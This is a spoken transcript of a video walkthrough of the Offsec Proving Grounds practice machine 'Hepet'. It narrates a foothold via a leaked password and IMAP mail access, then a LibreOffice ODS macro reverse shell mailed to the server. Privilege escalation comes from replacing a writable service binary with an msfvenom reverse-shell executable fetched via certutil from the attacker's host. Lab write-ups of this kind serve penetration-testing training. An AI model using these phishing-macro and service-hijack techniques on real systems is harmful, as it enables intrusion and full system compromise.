Hey, it's Rob. I'm back. We're doing another Offsec Proving Grounds practice machine. This time we're doing a machine called Hepet or Hepet. It is a Windows box and it is rated as intermediate, and I thought it was very difficult, to be honest. It took me quite some time. So without further ado, you can see I am on Offsec's VPN and I do have Hepet spun up, and here's the IP address. The first thing that we did was we ran an IMAP scan, service version detection, T4 aggressive on all ports, and what came back was SMTP, finger, and it looks like there's a bunch of POP3 ports here, as well as SMB, IMAP, 443, so secure HTTP, 2224, which is running something on HTTP, 5040, which is running unknown, 8000, which is another HTTP port, 11,100, which is running VNC, and then another port, 20,001 on FTP, FileZilla. And it allows anonymous access, as well as a bunch of MySQL and RPC ports. So there is a ton of stuff going on with this machine. Just to keep this video brief, because it is going to take a little bit, I will tell you this. I logged into FTP anonymously, and I mean, there is just a crap ton of stuff in here that you can just sink a lot of time into. But I went through all the directories, I went through all the files, I downloaded all of them, and I didn't see anything that was of value. So I quickly gave up on the FTP angle, and I decided to look at the websites. So if we go to 80, it basically redirects to 443, and it's this front-end website called Time Travel, and there's some stuff in here that could be of interest. Namely, there are some potential users, and you know, that's really about it. I really didn't bother going with the something.com in the host file. I didn't really think it was necessary. But I'll be honest with you, there wasn't a whole lot other than the users that I noticed. So if we go and we look at this website, let's see, duplicate, and let's bring up port, let's get rid of HTTPS, and we'll bring up port 22224. It takes you to this Mercury 32 mailing list subscription management services. Now I clicked on this and I really didn't see anything that I could potentially even abuse here. So I wasn't exactly sure what to do, other than I did take down the Mercury version, Mercury 32, and try to see if I could find any exploits, but really that was kind of another rabbit hole. So if you go to 8000, you get the same thing again. You get this time travel page. Let me just make sure it was 8000. Oh, I know why. It's not a secure connection. Again, it just takes you to this time travel page, which is the same exact thing we just looked at. So I was really kind of stuck for a while. Until I'm going to be honest with you, I probably spent a lot of time enumerating, doing go busting, and just trying to figure out what my game plan was, because I really was kind of lost. I didn't know what to do. But ultimately, the answer, and I hate when they do stuff like this, I just did another machine where it was this really kind of obtuse way to get a password and a username. But if you scroll down, and you look at these people, we see there's Ella Arwell, System Administrator, Charlotte D, Security and Pen Tester, Magnus U is a designer, Agnes T is Public Relations, and then we see this Jonas K, and this looks suspiciously like a password. So I didn't see anywhere else that I could potentially log in other than email. And I'm not real familiar with IMAP, so I ended up looking up how to log into IMAP using the command line, and I found this website, and this is just a fantastic website. They give you all the commands that you need, how to log in, how to query for email, So for example, how to connect first and foremost, how to log in. So really the thing that was throwing me off was this A1, this is required. This is part of the command. So if you want to, we wanted to log in as Jonas, we would log in as Jonas, and then, with the password. And then there's all these other commands, and even just fetching email is kind of a chore. Let's see here. Yeah, you can fetch body headers. Like I was getting the bodies of the email, I wasn't getting the headers, so I didn't know who it was from. So ultimately, I ran a couple of commands twice just to get the information that I needed. But this website, Saved by Bacon, because I am not, I don't have a lot of experience with IMAP. Matter of fact, this is the first machine that I think I've come across out of the hundreds that I've done, where IMAP was the mechanism to get your foothold. So what we're going to do here is we're going to open up a terminal, and we're going to netcat to the IP address on 143, which is the port for IMAP, okay? We're going to hit enter. Now, all these commands that I'm going to show you, I took exactly from that website that I just showed you. I just modified them for my case, okay? So the first thing that you need to do to get email from the command line is you need to log in. So we're going to log in as Jonas with that password. Okay, login is completed. Then you have to list to see what's available. Copy, paste, and we have this inbox. Okay, so now we have to do another command to select the inbox. And it says G21 select inbox. Okay, so now you can see 5 emails exist. So now to fetch the body or the text of the emails, what I did was this command. I'm sure you can combine some of these, but I was impatient because it took me so long to even get to this point. So this fetched the body of the emails. Now the reason you're seeing all this gibberish is because one of the emails contains a BMP file. So if we go back and we look, there's a bunch of emails here. There's this welcome mail to Pegasus mail from David Harris, and we're going to print out the headers so we know the email addresses soon enough. And then you can see there's some email here. It says, "Hi team, I'm new here doing PR for the company. If you can send me the mail, send to mail admin the spreadsheet for printing with all the company contacts, that would be appreciated." Here we go. This is the key right here, and this is what told me what we had to do next. This is going to be another not phishing exercise in a sense that it's not going to be somebody clicking on a link. It is going to be or opening an email. It's going to be the actual mail server that's going to be processing spreadsheets. So if you read this, we will changing our Office suite to LibreOffice. For the moment, all the spreadsheets and documents will be first processed in the mail server directly to check the compatibility. So that theoretically means to me that if the server is going to process these spreadsheets, that we can put something in there that will enable us to get some kind of reverse shell or something like that. Okay. And then here's the email. "Hey Jonas, please change your password. You cannot use the same password as your one-liner description. Just don't." Well, he did. So that's how we got in. So that's the key right here is we need to craft an ODS file, which is a LibreOffice Sheets document, and somehow make it so that when the mail server processes it, it triggers a reverse shell. Now, I'm going to be honest with you. I tried to do this the good old-fashioned way by installing LibreOffice, and I tried everything. I tried certutil, invoke web request. I tried all kinds of stuff, and I never really got had any luck with it. So what I did was I looked on Google for ODS macro, reverse shell macro generator, and literally the first link that comes up is this GitHub, XBOF Ghost, MMGLO. This is a malicious macro generator for LibreOffice, and he has one for each of the programs that come within LibreOffice. We're interested in the calc spreadsheet, which is an ODS file. So the plan here is to download this code, run it, generate a malicious ODS. Now, I'm going to tell you right now, some of the arguments are not intuitive with this code, so I'll explain it because they use things like rhost and rport, and I think they use it from the perspective of the server that's being attacked, because typically when you think of rhost and rport, that would be the machine you're attacking. But in our case, it's RIP and R port that we're going to be listening on. And I will also tell you, it takes a little bit of time to get the reverse shell back. So I spent a crap ton of time just waiting and waiting and waiting for things to work that didn't work. So I spent a lot of time doing that before I found this macro generator. And this seemed to work pretty much perfectly the first time I did it. I was amazed because I literally probably spent an hour trying to do this manually and with a couple of other tools. Okay. So we're going to grab this ods.py. And we're going to download the code. Okay. And we are going to open our folder. And it looks like it doesn't use anything crazy. So I think we should be just fine. No Python virtual environment needed. So I think what I'm going to do is, for ease, I'm going to pop that into my Kali directory. Open folder. So, and you can see here, I have this spreadsheet.ods that I created with MSF Venom and reverse shell payload. I tried numerous angles to get my foothold, and none of them worked. So let's go into downloads. We'll grab this script. We'll drop it in our Kali folder. And then what we're going to do is we're going to open a terminal here. And then I think we just have to run Python 3. And I even tried another program called Macro Generator. That didn't work out very well. Enter, and then I think we can do help. Now here is where I was confused at first, because what they do, you have to give 3 positional commands or arguments. The first is if this is Linux or Windows, and obviously this is a Windows machine. Then it says rhost and rport. That is typically the machine you're attacking. If you put those in there, this is not going to work. You have to put your IP address and your port that you're going to be listening on here. Okay? So what we're going to do is we're going to run it again, and we're going to select Windows. And then we're going to put our IP address in here, 168.45.198. And I guess we'll try it on 80 and see what happens. And this should generate a file.ods for us to send over to that machine. Okay? So we'll hit enter. And if we do an ls, we can see we do have this file ODS here. So the first thing that we're going to want to do is we're going to want to start a netcat listener. We'll try it on 80 and see what happens. Okay? And then what we're going to do is I'm going to use a command. Oh, you know what I forgot to show you too? I forgot to show you this. What we're going to want to do is you're going to want to find out, this only gave us the header, right? I want to show you how I got the email that I actually sent this to. So we're going to do this second fetch command. And this is fetching the header of the email, okay, for all 5. So if we hit enter, if we go back to that email 2, I believe it is, we can see it's from mailadmin@localhost.com. So that is where I got the email address that we're going to be sending this email to, okay? I'm glad I remembered that, because you guys would have been like, where'd you get that email address from? I'm sure one of you are much more clever than me, and you can figure out how to query this so that it gives you the header and the body of the email at once. But I didn't really go into it that deep. I was pressed for time, and I just wanted to get the information. So once I knew it was email number 2, I just went back, I printed all the headers, and then I saw who the email was from number 2. Okay, so mailadmin@localhost. So that's the email address we're going to be using. Okay, so we got our listener listening. We're going to come back here. We have our file ODS in this directory. I'm going to use an email program that I've used in other phishing videos, specifically job. If you remember, I did a Hack the Box one where we had to send some malicious Libre doc files to get a reverse shell. And it's a pretty simple program. This is the command that we're going to use, and I'll explain it before we hit enter. It's send email, and then the sender is who it's from is Jonas at localhost. We always want to use localhost, right? This is not an external email system. This is an internal email system. So we're going to send it as Jonas from localhost to mailadmin at localhost, which is, we got that from IMAP. When we downloaded the headers, we could see that email number 2 is the one that mentioned that these spreadsheets were going to be processed, and it was from mailadmin at localhost.com, or localhost. And then the server is the IP address of the machine that has the mail server on it. This is the subject. This is the body right here. And then the attachment, we're going to attach file ODS. And you have to make sure that file ODS is in the same directory that you're running this command from. Okay? So we're going to hit enter. And it says email was successfully sent. So now we're going to come back to our listener. It takes a few minutes, so I'm going to pause the video and I'll be back when we have a shell. Okay, I'm back, and we did in fact get a shell. So we're just going to hit enter and we get a PowerShell prompt. So if we type who am I, we're Ella Arwo. Okay, so the first thing that we should probably do is cd to c users, do a dir, and we can see there's a directory for Ella. So let's cd, and I'll put this in quotes, Ella Arwell. Okay, and if we do cd desktop, we can do a dir, and we can see the local.txt. So we'll type local.txt. This was the hardest part of the machine. This took me, I think it took me four or 5 hours to do this machine. I probably spent four hours getting to this point, and then the last hour for the privilege escalation point, which is not horrific. Now, if we do who am I priv, who am I priv. So we can shut the machine down, which is could be of use. We could reboot the system. Change notify privilege, undock privilege, increase working set privilege, SE time zone privilege. So ultimately, we don't really have a lot here, if anything. Okay, it says most of these are disabled anyway. So what I ended up doing was I was trying to get away from using WinPeas as much, because I really don't like the way WinPeas works on Windows. I think LinPeas is great on Linux, but you know, I just think it's information overload. So what I decided to do was to download PowerUp and see if there was anything that I could get out of invoke all checks or something like that. Okay, so that's what we're going to do. And if you need to download that, I will include a link in the description below. We have PowerUp right here. We're going to download it. We're going to open our folder. And then what we're going to do is we're going to open a terminal here, and we're going to do a Python web server on 8000. Okay. We're going to go back to our foothold, and we're going to do certutil URL cache file http 192.168.45.198.8000, and we're going to grab PowerUp PS1. Oh, I messed that up. Sorry, guys. It is certutil URL cache file http 192.168.45.198.8000 PowerUp .ps1, and we're going to call it PowerUp.ps1. Okay, sorry about that. I forgot to put the file name that I wanted it to be when it was copied to the machine. So that's why we got that flash of nonsense that went by. So if we do a dir, we can see PowerUp is there. Now, I'm 100% sure if you ran WinPs, you'd find this as well. It pops right up, and it's really obvious what the privilege escalation method is here. So let's just get to it. First, we have to basically call this PowerUp PS1 script. And you do that with dot and then space dot backslash PowerUp PS1, which is loading it into PowerShell. And then we can use commands like invoke all checks. And that'll take a second. All right. So there's not a whole lot that you have to go through. And this is kind of why I wanted to go this route, because I think you would still have found this, but with LinPs or WinPs, but it's so obvious right here. There's this Venyon service. It's literally in Ella Arwell's home directory, and it's an exe that we likely have the ability to overwrite and put our own binary there, okay? Because it's in her home directory. So the plan when I saw this was to create a malicious Venyon service.exe file, put it into the machine, and then reboot the machine and have it execute that service and hopefully give us a reverse shell as soon as that service loads. So that's what we're going to try to do. All right. So the first thing that we need to do now that we know this is we need to create our malicious executable. The way we're going to do that is with MSF Venom. So you guys have probably seen this 1,000,001 times, but I'm going to explain it anyway. So MSF Venom, architecture x86, probably, I think that might be x64, but it doesn't really matter. Windows reverse shell TCP. Lhost is your IP. Lport is the port that we're going to have a listener on. We want it in the format of an executable, and we want to call it veyon-service.exe. So we're going to hit enter. All right, we're going to do an ls, and I'm going to copy this so that I don't have to type it. Copy. And what we're going to do is we are going to, let's see, I think we might still have yes, we need to kill this web server, so Control-C. And we need to go back into the directory where we have this, and we will start another web server on 8000. And we're going to download this veyon-service.exe to the home directory of Ella Arwell. Now, before we do that, we need to go into that directory, which is in her home directory. It's Veyon and then Veyon service, and we probably need to either remove this or rename it. I'm going to probably just rename it, okay? So we'll cd, and it's Veyon. Oh, we have to get out of desktop first. cd Veyon. If I could type today, it would be a miracle. I apologize. Veyon. All right, so we're in that directory, so let's do dir. And we have the Veyon service.exe here. So let's do a move, and we'll just use the paste that we have. Veyon service.exe to Veyon service.exe.old. All right. Let's do a dir. And now that service is no longer .exe, it's a .old. So now what we're going to do is we're going to assert util URL cache file http 192.168.45.198.8000. This Vayon service, paste, and we're going to hit a space, and we're going to put Vayon service again because that's what we want it to be called. Okay. Okay, so let's do a dir. And it looks successful. Okay, it looks successful. So what we theoretically should be able to do now is we should be able to just reboot the machine. Okay, and what we need to do first is kill this web server, and let's start a listener on 44444. So NLVP on 4444. So what we're going to do is we're going to come back over here, and we're going to do shutdown R, and then I don't think you need this T0, just means now. And the R is the reboot portion of this. Don't forget that. You don't want to just shut down the machine. You want it to reboot. So when it reboots, it starts that service. Okay, so we're going to hit enter. Okay, so we lost the connection. And now we'll just come over here. And I don't think it takes very long because these are virtual machines up in the cloud. So I would suspect we'll get a shell probably 30 seconds or so. So I'm not going to pause the video. We can just wait and see if we get the shell together. Worst case scenario, and I have to figure out if something's wrong, I can always pause the video. This machine was difficult for me. I've never used IMAP a bunch, and I don't have a lot of experience with PowerSploit, so I've been trying to use it more. So there we go. We got a shell. It connected. So let's do a who am I, and we are NT authority system. So now we can cd c users administrator desktop, and we can do a dir, and we can type proof.txt, and there's the flag. So like I said, this machine was hard. I learned a little bit when I did this one because I had to do a lot of research on IMAP, and I thought, like I said, I think this machine took me 5 hours. 4 of it I spent just trying to get the foothold. This service hijacking I've done I don't know how many times, so that wasn't too bad. And PowerUp worked great. I mean, it was so obvious because the output was so condensed that I knew exactly what I needed to do. So the way we took advantage of the machine, we ran an IMAP scan. There were a boatload of ports open. We went to FTP. We logged in anonymously. There was nothing. Okay. So we went to the websites, did a bunch of investigation. There wasn't anything really there until we noticed that one of the users had a very strange title that looked like a password. So then I found a website on how to query IMAP, connected to the IMAP server, was able to log in as Jonas, was able to retrieve the emails and the headers. The emails specified that the email server was set up to process spreadsheets for compatibility. So the thought was we create a malicious ODS, we send it to mail admin at localhost, and we potentially get a reverse shell. So that's what we did. We found an exploit to create. I tried doing it manually. I spent probably an hour and a half trying to do manual ODS spreadsheets and cert util and invoke web requests inside of these spreadsheets, and nothing was working. So eventually I went with a ODS macro generator, which worked the first time, was fantastic. We got a reverse shell after we sent the email. We did some enumeration. Ultimately, we decided to run PowerUp, and when we did invoke all checks, we saw there was this Vayon service that was in the user's home directory. That was a service that we could potentially hijack. So we created a malicious executable using MSF Venom, downloaded that, rebooted the machine, and when the machine rebooted, we got a reverse shell and was able to type out the flag. So I hope you found this video useful. I hope you learned something. If I used any links, they'll be in the description below. If you have any questions, comments, concerns, criticisms, just want to say hi, drop a comment. I would love to chat with you. I do have a Discord server. All the information's on my YouTube page, so please join us. We'd love to build a community, and we'd love to have you. I want to thank you guys for watching, and I'll see you all in the next video.